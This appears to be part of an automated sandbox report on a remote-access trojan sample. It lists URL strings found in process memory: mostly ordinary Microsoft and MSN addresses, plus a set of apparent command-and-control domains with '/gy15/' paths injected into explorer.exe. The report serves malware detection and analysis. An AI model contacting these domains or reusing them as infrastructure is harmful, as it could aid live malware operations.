Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000002.4572315020.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145350381.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145316957.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, KfYvtUBOq.exe, 00000008.00000002.2186011893.0000000002D96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.onlineReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photosReferer:
Source: explorer.exe, 00000009.00000003.2980175213.000000000C406000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980659407.000000000C40C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979452129.000000000C3F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2160546176.000000000C3F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.storeReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4590979961.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000564F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/:80gy15?RzuTsp=0BfZhhXj03xBTAibP1YuAxS
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmasReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/www.99812.photos
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/www.oiupa.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz
Source: explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shopReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.netReferer:
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
